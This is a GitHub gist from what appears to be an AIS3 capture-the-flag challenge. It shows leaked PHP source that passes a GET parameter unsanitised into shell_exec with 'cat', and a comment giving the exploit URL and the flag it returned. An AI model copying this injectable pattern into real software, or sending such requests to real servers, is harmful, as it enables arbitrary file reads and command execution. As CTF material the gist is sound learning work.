Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Select an option

  • Save honor2016tw/0b4abf796b9b4a878ab5587dd163e621 to your computer and use it in GitHub Desktop.

Select an option

Save honor2016tw/0b4abf796b9b4a878ab5587dd163e621 to your computer and use it in GitHub Desktop.
{"output":"<?php\n\nheader('Content-Type: application\/json');\n\nif ($file = @$_GET['get']) {\n $output = shell_exec(\"cat '$file'\");\n \n if ($output !== null) {\n echo json_encode([\n 'output' => $output\n ]);\n } else {\n echo json_encode([\n 'error' => 'cannot get file'\n ]);\n }\n} else {\n echo json_encode([\n 'error' => 'empty file path'\n ]);\n}\n"}
@honor2016tw
Copy link
Author

https://squirrel.ais3.org/api.php?get=/5qu1rr3l_15_4_k1nd_0f_b16_r47.txt

{"output":"AIS3{5qu1rr3l_15_4_k1nd_0f_b16_r47}\n"}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment